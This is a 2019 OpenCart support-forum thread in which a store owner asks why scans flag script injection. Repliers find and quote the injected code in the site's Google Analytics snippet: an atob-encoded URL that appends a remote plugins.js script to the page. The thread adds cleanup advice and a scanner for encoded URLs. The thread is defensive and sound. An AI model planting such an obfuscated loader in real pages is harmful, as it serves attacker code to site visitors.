Post by rhorne » Thu Aug 08, 2019 8:40 pm

We run an online store, here: https://tinyurl.com/yxv2z9p4

Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js

See the below scan results for confirmation:

https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3

I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.

If anyone can shed any light I'd be very grateful.

Opencart 2.3.0.2. Journal 2 template.

Active Member

Joined: Wed Jan 18, 2012 3:07 am

Post by IP_CAM » Thu Aug 08, 2019 9:13 pm

Well, this topic seems to have been cleared out already, but that's what it takes
for Journal to make an OpenCart Software work. :crazy: :choke:
Image
---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition being mentioned a while
ago, so better get a professional, because nobody else would be able or willing to
assist in such an installation.
Good Luck ...
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


Legendary Member

Joined: Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rhorne » Thu Aug 08, 2019 10:16 pm

I'm confused. Your screenshot doesn't give me any clues. Yes there are lots of JS files but none of them that I can see link to that website.


Post by IP_CAM » Thu Aug 08, 2019 11:01 pm

Well, I just wanted to point out why so many don't like Journal Themes,
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC; it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie


Post by rhorne » Thu Aug 08, 2019 11:31 pm

Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?


Post by ADD Creative » Thu Aug 08, 2019 11:46 pm

It's these two lines of code. It's decoding the URL and then adding the script to the page.

Code:

  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);

It appears in your Google Analytics code.

Code:

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-34406391-6"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);

  gtag('js', new Date());

  gtag('config', 'UA-34406391-6');
</script>

You need to remove the code and fix your Google Analytics code. I would also recommend you check if your theme has any updates that may have security patches. Also change all your passwords, such as all OpenCart admin logins, all hosting control panel logins, all FTP accounts, etc.

www.add-creative.co.uk


Expert Member

Joined: Sat Jan 14, 2012 1:02 am
Location - United Kingdom
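
The injected URL in the post above exists only as a base64 literal, so a text search of a backup for the URL itself finds nothing. The following Node.js sketch is an added example, not code from the thread: it decodes quoted base64 literals and reports those that resolve to a URL on an unexpected host. The allow-list contents and the function name are assumptions; the sample input is the snippet quoted in the post.

```javascript
// Hosts the page is expected to load scripts from (assumption: adjust per site).
const ALLOWED_HOSTS = new Set(['www.googletagmanager.com']);

// Quoted runs of base64 characters, 16 or more long, with optional padding.
const B64_LITERAL = /(['"`])([A-Za-z0-9+/]{16,}={0,2})\1/g;

// Return one finding per base64 literal that decodes to a URL on a host
// outside the allow-list: { line, host, url }.
function findEncodedUrls(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const m of text.matchAll(B64_LITERAL)) {
      const literal = m[2];
      if (literal.length % 4 !== 0) continue; // not well-formed base64
      const decoded = Buffer.from(literal, 'base64').toString('utf8');
      // Keep only http(s) or protocol-relative URLs.
      if (!/^(https?:)?\/\//i.test(decoded)) continue;
      let host;
      try {
        host = new URL(decoded, 'https://placeholder.invalid').hostname;
      } catch {
        continue; // decoded text is not a parseable URL
      }
      if (!allowedHosts.has(host)) findings.push({ line: i + 1, host, url: decoded });
    }
  });
  return findings;
}

// Sample input: the inline script quoted in the thread, shortened.
const SAMPLE = `<script>
  window.dataLayer = window.dataLayer || [];
  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
  gtag('config', 'UA-34406391-6');
</script>`;

// Scan files named on the command line (CommonJS Node), else the sample.
const paths = process.argv.slice(2);
if (paths.length && typeof require === 'function') {
  const fs = require('fs');
  for (const p of paths) console.log(p, findEncodedUrls(fs.readFileSync(p, 'utf8')));
} else {
  console.log(findEncodedUrls(SAMPLE));
}
```

Run it over template files, stored settings exported from the database (analytics and custom-code fields), and theme JavaScript, since the injected snippet here sat inside the Google Analytics code rather than in a separate file.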

Post by Elevate » Thu Aug 08, 2019 11:49 pm

rhorne wrote:
Thu Aug 08, 2019 11:31 pm
Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?

Even though you're not running a Wordpress site, this implies that there are still WP files uploaded to the server. Is that the case? Hackers don't care whether or not you're actually running a WP site. They just want to find files and hack them so the malicious code gets executed and spread around.

ELEV8TE Website Development
https://www.elev8your.com


New member

Joined: Fri Jul 06, 2018 12:40 am
Location - Denver, Colorado, USA

Post by IP_CAM » Fri Aug 09, 2019 2:42 am

Hackers don't care whether or not you're actually running a WP site.

That's correct! And hacking Attempts on OC Sites are not uncommon, I frequently
redirect such Calls by use of a fine 1.5.x Extension, as you can see on the image below. :D
Ernie
---
Image


Post by rhorne » Fri Aug 09, 2019 3:24 pm

Thanks for your replies guys. I'll update the Google Analytics code and themes etc and change all passwords immediately. :)


Post by wrick0 » Fri Aug 09, 2019 4:02 pm

Make sure your host has ModSecurity installed, which can block most of the SQL attacks.

Active Member

Joined: Fri Jan 18, 2019 10:00 pm
Location - 127.0.0.1 @ The Netherlands